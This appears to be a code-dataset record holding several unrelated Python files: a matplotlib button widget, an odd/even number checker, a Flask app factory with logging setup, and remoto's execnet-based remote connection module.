kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()]*self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n # check inputs are correct\n self.validate_inputs()\n # create buttons\n self.create_buttons()\n\n def validate_inputs(self):\n # Make sure button labels is in correct format\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError(\"Button labels must be a list of strings\")\n # Make sure button actions is in correct format\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError(\"Button labels must be a list of strings\")\n # Make sure button actions is in correct format\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise 
TypeError()\n except TypeError:\n raise TypeError(\"Button params must be a dictionary\")\n # Make sure list are not empty and same length\n if len(self.button_labels) < 1:\n raise ValueError(\"'button_labels' Must have at least one button \"\n \"label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\"'button_actions' must be the same length \"\n \"as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n # Make sure all button actions are supported\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = \"supported. \\n Currently supported actions are: \\n\"\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = (1. / (b_N + 1)) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n\n # adjust the figure\n plt.subplots_adjust(bottom=0.25)\n # populate buttons\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n\n def next(self, event):\n \"\"\"\n Event for clicking a button with action \"NEXT\"\n \n Sets self.result to 1\n \n :param event: \n :return: \n \"\"\"\n self.result = 1\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval,\n maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue,\n minvalue=minval,\n maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n 
plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n # get mouse click location in pixels\n x, y = event.x, event.y\n # get the current canvas width and height (in pixels)\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n # loop round each button region\n for r, rn in enumerate(self.regions):\n # convert region to pixels\n rn1 = [rn[0]*width, rn[1]*height,\n (rn[0] + rn[2])*width, (rn[1] + rn[3])*height]\n # test whether x, y are in region\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\n# Main code to test the rectangle selector\nif __name__ == '__main__':\n import numpy as np\n # plt.close()\n # fig, frame = plt.subplots(ncols=1, nrows=1)\n # x = np.random.rand(100)\n # y = np.random.rand(100)\n # plt.scatter(x, y, color='k', marker='o', s=20)\n # odict = dict(close=True)\n # a = Add_Buttons(ax=frame,\n # button_labels=['A', 'B'],\n # button_actions=['OPTION', 'OPTION'],\n # button_params=[odict, odict])\n # plt.show()\n # plt.close()\n\n plt.close()\n fig, frame = plt.subplots(ncols=1, nrows=1)\n x = np.random.rand(100)\n y = np.random.rand(100)\n plt.scatter(x, y, color='k', marker='o', s=20)\n odict = dict(close=True)\n udict = dict(name='x', fmt=int, title='Enter value',\n comment='Please enter x in meters.', minval=4, maxval=10)\n a = Add_Buttons(ax=frame,\n button_labels=['Enter value', 'Close'],\n button_actions=['UINPUT', 'OPTION'],\n button_params=[udict, odict])\n plt.show()\n plt.close()\n\n# =============================================================================\n# End of code\n# =============================================================================\n",
"step-ids": [
6,
8,
9,
10,
13
]
}
|
[
6,
8,
9,
10,
13
] |
# Purpose: determine whether the given number is odd or even
# Author: João Cândido
p = 0
i = 0
numero = int(input("Insira um número: "))
if numero % 2 == 0:
p = numero
print (p, "é um número par")
else:
i = numero
print (i, "é um número ímpar")
|
normal
|
{
"blob_id": "382bc321c5fd35682bc735ca4d6e293d09be64ec",
"index": 9990,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif numero % 2 == 0:\n p = numero\n print(p, 'é um número par')\nelse:\n i = numero\n print(i, 'é um número ímpar')\n",
"step-3": "p = 0\ni = 0\nnumero = int(input('Insira um número: '))\nif numero % 2 == 0:\n p = numero\n print(p, 'é um número par')\nelse:\n i = numero\n print(i, 'é um número ímpar')\n",
"step-4": "#função: Definir se o número inserido é ímpar ou par\n#autor: João Cândido\n\np = 0\ni = 0\n\nnumero = int(input(\"Insira um número: \"))\n\nif numero % 2 == 0:\n\tp = numero\n\tprint (p, \"é um número par\")\nelse:\n\ti = numero\n\tprint (i, \"é um número ímpar\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
#coding=utf-8
"""
__init__.py
:license: BSD, see LICENSE for more details.
"""
import os
import logging
import sys
from logging.handlers import SMTPHandler, RotatingFileHandler
from flask import Flask, g, session, request, flash, redirect, jsonify, url_for
from flaskext.babel import Babel
from bg import helpers
from bg.extensions import db, mail, cache, photos, identity_changed, Identity
from bg.views import frontend,admin,post,account
from bg.models import Post
DEFAULT_MODULES = (
(frontend, ""),
(post, "/post"),
(account, "/account"),
(admin, "/admin"),)
DEFAULT_APP_NAME = 'bg'
def create_app(config=None, modules=None):
if modules is None:
modules = DEFAULT_MODULES
app = Flask(DEFAULT_APP_NAME)
    # load configuration from the given pyfile path
app.config.from_pyfile(config)
configure_extensions(app)
configure_logging(app)
configure_errorhandlers(app)
configure_before_handlers(app)
configure_template_filters(app)
configure_context_processors(app)
configure_signals(app)
babel = Babel(app)
# register module
configure_modules(app, modules)
return app
def on_identity_changed(app, identity):
g.identity = identity
session['identity'] = identity
def configure_signals(app):
identity_changed.connect(on_identity_changed, app)
def configure_errorhandlers(app):
@app.errorhandler(401)
def unauthorized(error):
#if request.is_xhr:
# return jsonfiy(error=_("Login required"))
flash(("Please login to see this page"), "error")
#return redirect(url_for("account.login", next=request.path))
return redirect(url_for("account.login"))
def configure_before_handlers(app):
@app.before_request
def authenticate():
try:
g.identity = session['identity']
except Exception:
g.identity = Identity(0,'Login')
def configure_extensions(app):
# configure extensions
db.init_app(app)
#db.app = app
#db.create_all()
mail.init_app(app)
cache.init_app(app)
#setup_themes(app)
def configure_context_processors(app):
@app.context_processor
def archives():
archives = set()
for dt in Post.query.from_self(Post.create_date).order_by().filter_by(author_id=g.identity.id):
item = (dt.create_date.year, dt.create_date.month)
archives.add(item)
if len(archives) > 5:
break
archives = sorted(list(archives))
return dict(archives=archives)
def configure_modules(app, modules):
for module, url_prefix in modules:
app.register_module(module, url_prefix=url_prefix)
def configure_template_filters(app):
@app.template_filter()
def timesince(value):
return helpers.timesince(value)
@app.template_filter()
def endtags(value):
return helpers.endtags(value)
@app.template_filter()
def gravatar(email,size):
return helpers.gravatar(email,size)
@app.template_filter()
def format_date(date,s='full'):
return helpers.format_date(date,s)
@app.template_filter()
def format_datetime(time,s='full'):
return helpers.format_datetime(time,s)
@app.template_filter()
def format_yearmonth(date):
return '%s-%s'%date
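    # Illustrative Jinja usage of the filters registered above (the template
    # variables shown here are assumptions, not anything defined in this module):
    #   {{ post.create_date|format_date('medium') }}
    #   {{ post.create_date|timesince }}
    #   {{ user.email|gravatar(40) }}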
def configure_logging(app):
mail_handler = \
SMTPHandler(app.config['MAIL_SERVER'],
app.config['DEFAULT_MAIL_SENDER'],
app.config['ADMINS'],
'application error',
(
app.config['MAIL_USERNAME'],
app.config['MAIL_PASSWORD'],
))
mail_handler.setLevel(logging.ERROR)
app.logger.addHandler(mail_handler)
formatter = logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]')
debug_log = os.path.join(app.root_path,
app.config['DEBUG_LOG'])
debug_file_handler = \
RotatingFileHandler(debug_log,
maxBytes=100000,
backupCount=10)
debug_file_handler.setLevel(logging.DEBUG)
debug_file_handler.setFormatter(formatter)
app.logger.addHandler(debug_file_handler)
error_log = os.path.join(app.root_path,
app.config['ERROR_LOG'])
error_file_handler = \
RotatingFileHandler(error_log,
maxBytes=100000,
backupCount=10)
error_file_handler.setLevel(logging.ERROR)
error_file_handler.setFormatter(formatter)
app.logger.addHandler(error_file_handler)
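# Usage sketch, not part of the package itself: 'config.cfg' is an assumed
# settings pyfile providing the keys referenced above (MAIL_SERVER, ADMINS,
# DEBUG_LOG, ERROR_LOG, ...). Running this module directly would start the
# app under the Werkzeug development server.
if __name__ == '__main__':
    app = create_app(config='config.cfg')
    app.run(debug=True)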
|
normal
|
{
"blob_id": "ef124e8c15ef347efd709a5e3fb104c7fd1bccde",
"index": 2753,
"step-1": "<mask token>\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\n<mask token>\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email, size):\n return helpers.gravatar(email, size)\n\n @app.template_filter()\n def format_date(date, s='full'):\n return helpers.format_date(date, s)\n\n @app.template_filter()\n def format_datetime(time, s='full'):\n return helpers.format_datetime(time, s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s' % date\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email, size):\n return helpers.gravatar(email, size)\n\n @app.template_filter()\n def format_date(date, s='full'):\n return helpers.format_date(date, s)\n\n @app.template_filter()\n def format_datetime(time, s='full'):\n return helpers.format_datetime(time, s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s' % date\n\n\ndef configure_logging(app):\n mail_handler = SMTPHandler(app.config['MAIL_SERVER'], app.config[\n 'DEFAULT_MAIL_SENDER'], app.config['ADMINS'], 'application error',\n (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD']))\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n debug_log = os.path.join(app.root_path, app.config['DEBUG_LOG'])\n debug_file_handler = RotatingFileHandler(debug_log, maxBytes=100000,\n backupCount=10)\n debug_file_handler.setLevel(logging.DEBUG)\n debug_file_handler.setFormatter(formatter)\n app.logger.addHandler(debug_file_handler)\n error_log = os.path.join(app.root_path, app.config['ERROR_LOG'])\n error_file_handler = RotatingFileHandler(error_log, maxBytes=100000,\n backupCount=10)\n error_file_handler.setLevel(logging.ERROR)\n error_file_handler.setFormatter(formatter)\n app.logger.addHandler(error_file_handler)\n",
"step-5": "#!/usr/bin/env python\n#coding=utf-8\n\n\"\"\"\n __init__.py\n\n :license: BSD, see LICENSE for more details.\n\"\"\"\n\nimport os\nimport logging\nimport sys\n\nfrom logging.handlers import SMTPHandler, RotatingFileHandler\nfrom flask import Flask, g, session, request, flash, redirect, jsonify, url_for\nfrom flaskext.babel import Babel\n\nfrom bg import helpers\nfrom bg.extensions import db, mail, cache, photos, identity_changed, Identity\n\nfrom bg.views import frontend,admin,post,account\nfrom bg.models import Post\n\nDEFAULT_MODULES = (\n (frontend, \"\"),\n (post, \"/post\"),\n (account, \"/account\"),\n (admin, \"/admin\"),)\n\nDEFAULT_APP_NAME = 'bg'\n\ndef create_app(config=None, modules=None):\n\n if modules is None:\n modules = DEFAULT_MODULES\n\n app = Flask(DEFAULT_APP_NAME)\n\n #config\n app.config.from_pyfile(config)\n configure_extensions(app)\n\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n\n # register module\n configure_modules(app, modules)\n\n return app\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n #if request.is_xhr:\n # return jsonfiy(error=_(\"Login required\"))\n flash((\"Please login to see this page\"), \"error\")\n #return redirect(url_for(\"account.login\", next=request.path))\n return redirect(url_for(\"account.login\"))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0,'Login')\n\n\ndef configure_extensions(app):\n # configure extensions\n db.init_app(app)\n #db.app = app\n #db.create_all()\n mail.init_app(app)\n cache.init_app(app)\n #setup_themes(app)\n\ndef configure_context_processors(app):\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(author_id=g.identity.id):\n item = (dt.create_date.year, dt.create_date.month)\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\ndef configure_modules(app, modules):\n\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email,size):\n return helpers.gravatar(email,size)\n\n @app.template_filter()\n def format_date(date,s='full'):\n return helpers.format_date(date,s)\n\n @app.template_filter()\n def format_datetime(time,s='full'):\n return helpers.format_datetime(time,s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s'%date\n\ndef configure_logging(app):\n\n mail_handler = \\\n SMTPHandler(app.config['MAIL_SERVER'],\n app.config['DEFAULT_MAIL_SENDER'],\n app.config['ADMINS'],\n 'application error',\n (\n app.config['MAIL_USERNAME'],\n app.config['MAIL_PASSWORD'],\n ))\n\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s '\n '[in 
%(pathname)s:%(lineno)d]')\n\n debug_log = os.path.join(app.root_path,\n app.config['DEBUG_LOG'])\n\n debug_file_handler = \\\n RotatingFileHandler(debug_log,\n maxBytes=100000,\n backupCount=10)\n\n debug_file_handler.setLevel(logging.DEBUG)\n debug_file_handler.setFormatter(formatter)\n app.logger.addHandler(debug_file_handler)\n\n error_log = os.path.join(app.root_path,\n app.config['ERROR_LOG'])\n\n error_file_handler = \\\n RotatingFileHandler(error_log,\n maxBytes=100000,\n backupCount=10)\n\n error_file_handler.setLevel(logging.ERROR)\n error_file_handler.setFormatter(formatter)\n app.logger.addHandler(error_file_handler)\n\n",
"step-ids": [
6,
8,
9,
10,
13
]
}
|
[
6,
8,
9,
10,
13
] |
import inspect
import json
import socket
import sys
import execnet
import logging
from remoto.process import check
class BaseConnection(object):
"""
Base class for Connection objects. Provides a generic interface to execnet
for setting up the connection
"""
executable = ''
remote_import_system = 'legacy'
def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=True,
detect_sudo=False, use_ssh=False, interpreter=None, ssh_options=None):
self.sudo = sudo
self.hostname = hostname
self.ssh_options = ssh_options
self.logger = logger or basic_remote_logger()
self.remote_module = None
self.channel = None
self.use_ssh = use_ssh
        self.global_timeout = None  # wait forever
self.interpreter = interpreter or 'python%s' % sys.version_info[0]
if eager:
try:
if detect_sudo:
self.sudo = self._detect_sudo()
self.gateway = self._make_gateway(hostname)
except OSError:
self.logger.error(
"Can't communicate with remote host, possibly because "
"%s is not installed there" % self.interpreter
)
raise
def _make_gateway(self, hostname):
self.group = execnet.Group()
gateway = self.group.makegateway(
self._make_connection_string(hostname)
)
gateway.reconfigure(py2str_as_py3str=False, py3str_as_py2str=False)
return gateway
def _detect_sudo(self, _execnet=None):
"""
``sudo`` detection has to create a different connection to the remote
host so that we can reliably ensure that ``getuser()`` will return the
right information.
After getting the user info it closes the connection and returns
a boolean
"""
exc = _execnet or execnet
gw = exc.makegateway(
self._make_connection_string(self.hostname, use_sudo=False)
)
channel = gw.remote_exec(
'import getpass; channel.send(getpass.getuser())'
)
result = channel.receive()
gw.exit()
if result == 'root':
return False
self.logger.debug('connection detected need for sudo')
return True
def _make_connection_string(self, hostname, _needs_ssh=None, use_sudo=None):
_needs_ssh = _needs_ssh or needs_ssh
interpreter = self.interpreter
if use_sudo is not None:
if use_sudo:
interpreter = 'sudo ' + interpreter
elif self.sudo:
interpreter = 'sudo ' + interpreter
if _needs_ssh(hostname) or self.use_ssh:
if self.ssh_options:
return 'ssh=%s %s//python=%s' % (
self.ssh_options, hostname, interpreter
)
else:
return 'ssh=%s//python=%s' % (hostname, interpreter)
return 'popen//python=%s' % interpreter
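    # Examples of the execnet specs this method builds (illustrative):
    #   local, no sudo : 'popen//python=python3'
    #   local, sudo    : 'popen//python=sudo python3'
    #   remote host    : 'ssh=node1//python=python3'
    #   remote + opts  : 'ssh=-p 2222 node1//python=python3'  (ssh_options='-p 2222')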
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.group.terminate(timeout=1.0)
return False
def cmd(self, cmd):
"""
In the base connection class, this method just returns the ``cmd``
as-is. Other implementations will end up doing transformations to the
command by prefixing it with other flags needed. See
:class:`KubernetesConnection` for an example
"""
return cmd
def execute(self, function, **kw):
return self.gateway.remote_exec(function, **kw)
def exit(self):
self.group.terminate(timeout=1.0)
def import_module(self, module, python_executable=None):
"""
Allows remote execution of a local module. Depending on the
``remote_import_system`` attribute it may use execnet's implementation
or remoto's own based on JSON.
.. note:: It is not possible to use execnet's remote execution model on
connections that aren't SSH or Local.
"""
if self.remote_import_system is not None:
if self.remote_import_system == 'json':
self.remote_module = JsonModuleExecute(self, module, self.logger,
python_executable=python_executable)
else:
self.remote_module = LegacyModuleExecute(self.gateway, module, self.logger)
else:
self.remote_module = LegacyModuleExecute(self.gateway, module, self.logger)
return self.remote_module
def has_connection(self):
if self.gateway:
return self.gateway.hasreceiver()
return False
class LegacyModuleExecute(object):
"""
This (now legacy) class, is the way ``execnet`` does its remote module
execution: it sends it over a channel, and does a send/receive for
exchanging information. This only works when there is native support in
execnet for a given connection. This currently means it would only work for
ssh and local (Popen) connections, and will not work for anything like
kubernetes or containers.
"""
def __init__(self, gateway, module, logger=None):
self.channel = gateway.remote_exec(module)
self.module = module
self.logger = logger
def __getattr__(self, name):
if not hasattr(self.module, name):
msg = "module %s does not have attribute %s" % (str(self.module), name)
raise AttributeError(msg)
docstring = self._get_func_doc(getattr(self.module, name))
def wrapper(*args):
arguments = self._convert_args(args)
if docstring:
self.logger.debug(docstring)
self.channel.send("%s(%s)" % (name, arguments))
try:
return self.channel.receive()
except Exception as error:
# Error will come as a string of a traceback, remove everything
# up to the actual exception since we do get garbage otherwise
# that points to non-existent lines in the compiled code
exc_line = str(error)
for tb_line in reversed(str(error).split('\n')):
if tb_line:
exc_line = tb_line
break
raise RuntimeError(exc_line)
return wrapper
def _get_func_doc(self, func):
try:
return getattr(func, 'func_doc').strip()
except AttributeError:
return ''
def _convert_args(self, args):
if args:
if len(args) > 1:
arguments = str(args).rstrip(')').lstrip('(')
else:
arguments = str(args).rstrip(',)').lstrip('(')
else:
arguments = ''
return arguments
dump_template = """
if __name__ == '__main__':
import json, traceback
obj = {'return': None, 'exception': None}
try:
obj['return'] = %s%s
except Exception:
obj['exception'] = traceback.format_exc()
try:
print(json.dumps(obj).decode('utf-8'))
except AttributeError:
print(json.dumps(obj))
"""
class JsonModuleExecute(object):
"""
This remote execution class allows to ship Python code over to the remote
node, load it via ``stdin`` and call any function with arguments. The
resulting response is dumped over JSON so that it can get printed to
``stdout``, then captured locally, loaded into regular Python and returned.
If the remote end generates an exception with a traceback, that is captured
as well and raised accordingly.
"""
def __init__(self, conn, module, logger=None, python_executable=None):
self.conn = conn
self.module = module
self._module_source = inspect.getsource(module)
self.logger = logger
self.python_executable = python_executable
def __getattr__(self, name):
if not hasattr(self.module, name):
msg = "module %s does not have attribute %s" % (str(self.module), name)
raise AttributeError(msg)
docstring = self._get_func_doc(getattr(self.module, name))
def wrapper(*args):
if docstring:
self.logger.debug(docstring)
if len(args):
source = self._module_source + dump_template % (name, repr(args))
else:
source = self._module_source + dump_template % (name, '()')
            # determine the remote python interpreter lazily on first call
if self.python_executable is None:
self.python_executable = get_python_executable(self.conn)
out, err, code = check(self.conn, [self.python_executable], stdin=source.encode('utf-8'))
if not out:
if not err:
err = [
'Traceback (most recent call last):',
' File "<stdin>", in <module>',
'Exception: error calling "%s"' % name
]
if code:
raise Exception('Unexpected remote exception: \n%s\n%s' % ('\n'.join(out), '\n'.join(err)))
# at this point, there was no stdout, and the exit code was 0,
# we must return so that we don't fail trying to serialize back
# the JSON
return
response = json.loads(out[0])
if response['exception']:
raise Exception(response['exception'])
return response['return']
return wrapper
def _get_func_doc(self, func):
try:
return getattr(func, 'func_doc').strip()
except AttributeError:
return ''
def basic_remote_logger():
logging.basicConfig()
logger = logging.getLogger(socket.gethostname())
logger.setLevel(logging.DEBUG)
return logger
def needs_ssh(hostname, _socket=None):
"""
    Determine whether reaching ``hostname`` requires SSH. Returns False for
    localhost and for any name matching this machine's hostname, short
    hostname, or FQDN; True otherwise.
"""
if hostname.lower() in ['localhost', '127.0.0.1', '127.0.1.1']:
return False
_socket = _socket or socket
fqdn = _socket.getfqdn()
if hostname == fqdn:
return False
local_hostname = _socket.gethostname()
local_short_hostname = local_hostname.split('.')[0]
if local_hostname == hostname or local_short_hostname == hostname:
return False
return True
def get_python_executable(conn):
"""
    Try to determine the remote Python executable so that it can be used
    when executing. Avoids the problem of differing Python versions, or of
    distros that ship ``python3`` but no ``python``.
"""
# executables in order of preference:
executables = ['python3', 'python', 'python2.7']
for executable in executables:
conn.logger.debug('trying to determine remote python executable with %s' % executable)
out, err, code = check(conn, ['which', executable])
if code:
conn.logger.warning('skipping %s, was not found in path' % executable)
else:
try:
return out[0].strip()
except IndexError:
conn.logger.warning('could not parse stdout: %s' % out)
    # if all else fails, just return whatever interpreter the main connection had
conn.logger.info('Falling back to using interpreter: %s' % conn.interpreter)
return conn.interpreter
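# Usage sketch, not part of this module. Assumes execnet is installed and uses
# the local host over the popen transport; any plain top-level module whose
# functions return JSON-serializable values can be shipped with the 'json'
# import system, the stdlib ``string`` module being one convenient example.
if __name__ == '__main__':
    import string
    with BaseConnection('localhost') as conn:
        conn.remote_import_system = 'json'
        remote = conn.import_module(string)
        print(remote.capwords('remote procedure call'))  # -> Remote Procedure Call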
|
normal
|
{
"blob_id": "ae38995d153deed2e6049b7b65fb5f28dfcef470",
"index": 1442,
